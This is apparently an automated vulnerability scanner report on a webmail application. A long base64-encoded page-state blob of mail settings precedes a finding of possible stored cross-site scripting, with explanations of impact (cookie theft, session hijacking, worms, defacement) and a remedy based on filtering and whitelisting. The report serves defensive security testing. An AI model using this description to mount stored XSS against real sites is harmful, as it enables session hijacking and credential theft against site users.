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YWJsZSBhbmQgZG9uJ3QgYWxsb3cgbWFpbBUDATABMQEyFCsDA2dnZxYBZmQCCw8PFgIfAmhkFgICAQ9kFgRmDw8WAh8EBQMxMDBkZAIDDw8WAh8EBQMxMDBkZAIMDw8WAh8CaGQWAgIBD2QWAmYPEA8WAh4HQ2hlY2tlZGhkZGRkAg0PDxYCHwJoZBYCAgEPZBYCZg8QDxYCHwdoZGRkZAIOD2QWAgIBD2QWAmYPEA8WBh8EBSBFbmFibGUgQWN0aXZlU3luYyAoTm90IExpY2Vuc2VkKR8HaB4HRW5hYmxlZGhkZGRkAg8PDxYCHwJoZBYCAgEPZBYCZg8QDxYCHwdoZGRkZAIQDw8WAh8CaGQWAgIBD2QWAmYPEA8WAh8HZ2RkZGQCEQ8PFgIfAmhkFgICAQ9kFgJmDxAPFgIfB2dkZGRkAhIPDxYCHwJoZBYCAgEPZBYCZg8QDxYCHwdoZGRkZAITDw8WAh8CaGQWAgIBD2QWAmYPEA8WAh8HZ2RkZGQCBA9kFgICAQ9kFgJmD2QWAgIBD2QWAgICDw8WAh8EZWRkAgYPZBYCAgEPZBYCZg9kFgICAQ9kFgJmDxBkDxYDZgIBAgIWAxAFDk1vdmUgdG8gRm9sZGVyBQphdXRvY3JlYXRlZxAFGk1vdmUgdG8gRm9sZGVyIChJZiBFeGlzdHMpZWcQBQ5MZWF2ZSBpbiBJbmJveAUFaW5ib3hnZGQCCA9kFgICAQ9kFg5mD2QWAgIBD2QWAmYPEGQQFQINTXkgVG9kYXkgUGFnZQhNeSBJbmJveBUC
BXRvZGF5BWluYm94FCsDAmdnZGQCAQ9kFgICAQ9kFgJmDxBkEBUCBEhUTUwEVGV4dBUCBGh0bWwFcGxhaW4UKwMCZ2dkZAICD2QWAgIBD2QWAmYPEGQQFQQERnJvbQdTdWJqZWN0BFNpemUERGF0ZRUEBEZyb20HU3ViamVjdARTaXplDEludGVybmFsRGF0ZRQrAwRnZ2dnZGQCAw9kFgICAQ9kFgJmDxBkEBUEHE1vdmUgdG8gRGVsZXRlZCBJdGVtcyBGb2xkZXIRQXV0byBQdXJnZSBGb2xkZXIPTWFyayBhcyBEZWxldGVkGE1hcmsgYXMgRGVsZXRlZCBhbmQgSGlkZRUEATABMQEyATMUKwMEZ2dnZ2RkAgQPDxYCHwJoZBYCAgEPZBYCZg8QZA8WAWYWARAFB0RlZmF1bHQFB0RlZmF1bHRnFgFmZAIFD2QWAgIBD2QWAmYPEGQQFQMGQm90dG9tClJpZ2h0IFNpZGUIRGlzYWJsZWQVAwZib3R0b20FcmlnaHQIZGlzYWJsZWQUKwMDZ2dnZGQCCw9kFgICAQ9kFgJmDxAPFgIfB2dkZGRkAgoPZBYCAgEPZBYQZg9kFgICAQ9kFgJmDxBkEBUCBEhUTUwEVGV4dBUCBGh0bWwFcGxhaW4UKwMCZ2dkZAIBD2QWAgIBD2QWBGYPEGQQFQoFQXJpYWwHQ291cmllcgdHZW9yZ2lhBkx1Y2lkYQ5MdWNpZGEgQ29uc29sZQhQYWxhdGlubwZUYWhvbWEFVGltZXMJVHJlYnVjaGV0B1ZlcmRhbmEVChxBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmFkNvdXJpZXIgTmV3LCBtb25vc3BhY2UOR2VvcmdpYSwgc2VyaWYuTHVjaWRhIFNhbnMgVW5pY29kZSwgTHVjaWRhIEdyYW5kZSwgc2Fucy1zZXJpZiFMdWNpZGEgQ29uc29sZSwgTW9uYWNvLCBtb25vc3BhY2UwUGFsYXRpbm8gTGlub3R5cGUsIEJvb2sgQW50aXF1YSwgUGFsYXRpbm8sIHNlcmlmGlRhaG9tYSwgR2VuZXZhLCBzYW5zLXNlcmlmHVRpbWVzIE5ldyBSb21hbiwgVGltZXMsIHNlcmlmGFRyZWJ1Y2hldCBNUywgc2Fucy1zZXJpZiVWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmFCsDCmdnZ2dnZ2dnZ2dkZAICDxBkEBUGAzhwdAM5cHQEMTBwdAQxMnB0BDE0cHQEMTZwdBUGAzhwdAM5cHQEMTBwdAQxMnB0BDE0cHQEMTZwdBQrAwZnZ2dnZ2dkZAICD2QWAgIBD2QWAmYPEGQQFSMMQXJhYmljIChJU08pEEFyYWJpYyAoV2luZG93cykMQmFsdGljIChJU08pEEJhbHRpYyAoV2luZG93cykWQ2VudHJhbCBFdXJvcGVhbiAoSVNPKRpDZW50cmFsIEV1cm9wZWFuIChXaW5kb3dzKRxDaGluZXNlIFNpbXBsaWZpZWQgKEdCMTgwMzApG0NoaW5lc2UgU2ltcGxpZmllZCAoR0IyMzEyKRdDaGluZXNlIFNpbXBsaWZpZWQgKEhaKRpDaGluZXNlIFRyYWRpdGlvbmFsIChCaWc1KQ5DeXJpbGxpYyAoSVNPKRFDeXJpbGxpYyAoS09JOC1SKRFDeXJpbGxpYyAoS09JOC1VKRJDeXJpbGxpYyAoV2luZG93cykLR3JlZWsgKElTTykPR3JlZWsgKFdpbmRvd3MpEEhlYnJldyAoV2luZG93cykVSGV3YnJldyAoSVNPLUxvZ2ljYWwpDkphcGFuZXNlIChKSVMpIEphcGFuZXNlIChKSVMtQWxsb3cgMSBieXRlIEthbmEpFEphcGFuZXNlIChTaGlmdC1KSVMpBktvcmVhbgxLb3JlYW4gKEVVQykMS29yZWFuIChJU08pDUxhdGluIDMg
KElTTykNTGF0aW4gOSAoSVNPKQ5UaGFpIChXaW5kb3dzKQ1UdXJraXNoIChJU08pEVR1cmtpc2ggKFdpbmRvd3MpD1VuaWNvZGUgKFVURi03KQ9Vbmljb2RlIChVVEYtOCkIVVMtQVNDSUkUVmlldG5hbWVzZSAoV2luZG93cykgV2VzdGVybiBFdXJvcGVhbiAoSVNPKSAoZGVmYXVsdCkaV2VzdGVybiBFdXJvcGVhbiAoV2luZG93cykVIwUyODU5NgQxMjU2BTI4NTk0BDEyNTcFMjg1OTIEMTI1MAU1NDkzNgM5MzYFNTI5MzYDOTUwBTI4NTk1BTIwODY2BTIxODY2BDEyNTEFMjg1OTcEMTI1MwQxMjU1BTM4NTk4BTUwMjIwBTUwMjIxAzkzMgM5NDkFNTE5NDkFNTAyMjUFMjg1OTMFMjg2MDUDODc0BTI4NTk5BDEyNTQFNjUwMDAFNjUwMDEFMjAxMjcEMTI1OAUyODU5MQQxMjUyFCsDI2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAw9kFgICAQ9kFgJmDxBkEBUCIkF0dGVtcHQgdG8gdXNlIGxhbmd1YWdlIGZyb20gbG9naW4XRW5nbGlzaCAoVW5pdGVkIFN0YXRlcykVAgAFZW4tVVMUKwMCZ2dkZAIED2QWAgIBD2QWAmYPEGQPFgNmAgECAhYDEAUGTm9ybWFsBQZub3JtYWxnEAUEVGV4dAUFcGxhaW5nEAUTRW1iZWQgYXMgQXR0YWNobWVudAUKYXR0YWNobWVudGdkZAIFD2QWAgIBD2QWAmYPEGQPFgVmAgECAgIDAgQWBRAFBE5vbmUFATBnEAUIMSBNaW51dGUFBTYwMDAwZxAFCTIgTWludXRlcwUGMTIwMDAwZxAFCTMgTWludXRlcwUGMTgwMDAwZxAFCTUgTWludXRlcwUGMzAwMDAwZ2RkAgYPZBYCAgEPZBYCZg8QZBAVAgVCYXNpYwRGdWxsFQIFQmFzaWMERnVsbBQrAwJnZ2RkAgcPZBYCAgEPZBYCAgIPDxYCHwQFAT5kZAIOD2QWAgIBD2QWBGYPDxYCHwJoZBYCAgEPZBYGZg8PFgIfBAUENTAwMGRkAgIPDxYCHwQFBDUwMDBkZAIDDxAPFgIfB2hkZGRkAgEPDxYCHwJoZBYCAgEPZBYGZg8PFgIfBAUDMTAwZGQCAg8PFgIfBAUDMTAwZGQCAw8QDxYCHwdoZGRkZBgGBR1jdGwwMCRUUEgkVGFiU3RyaXAkdGFiQ29tcG9zZQ8y3QsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3Js
aWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAACEBDb21wb3NlAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAARcHZDb21wb3NlU2V0dGluZ3MLZAUdY3RsMDAkVFBIJFRhYlN0cmlwJHRhYkRpc3BsYXkPMv4LAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMu
S2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAClVc2VyQ29udHJvbHMuVXNlclNldHRpbmdzX0Rpc3BsYXlTZXR0aW5ncwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAAEXB2RGlzcGxheVNldHRpbmdzC2QFIWN0bDAwJFRQSCRUYWJTdHJpcCR0YWJQbHVzQWRkcmVzcw8y/AsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVy
ZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAKFVzZXJDb250cm9scy5Vc2VyU2V0dGluZ3NfUGx1c0FkZHJlc3NpbmcB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAABBwdlBsdXNBZGRyZXNzaW5nC2QFGmN0bDAwJFRQSCRUYWJTdHJpcCR0YWJVc2VyDzLaCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1
YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAFQFVzZXIB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAABFwdlVzZXJJbmZvcm1hdGlvbgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDQVAY3RsMDA..
[Possible] Permanent Cross-site Scripting

[Possible] Permanent Cross-site Scripting

2 TOTAL
IMPORTANT

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This opens up several different attack opportunities, mostly hijacking the current session of the user, changing the look of the page by altering the HTML on the fly, or stealing the user's credentials. This happens because the input entered by the user has been interpreted as HTML/Javascript/VbScript within the browser.

Permanent means that the attack payload is stored in the back-end system. In a normal XSS attack the attacker needs to e-mail the victim, but in a permanent XSS the attacker can simply submit the payload once and wait for users to view the affected page. As soon as someone visits the page, the attacker's stored payload is executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might target an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is presented to the user.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list only needs to be defined once and should be used to sanitize and validate all subsequent input.

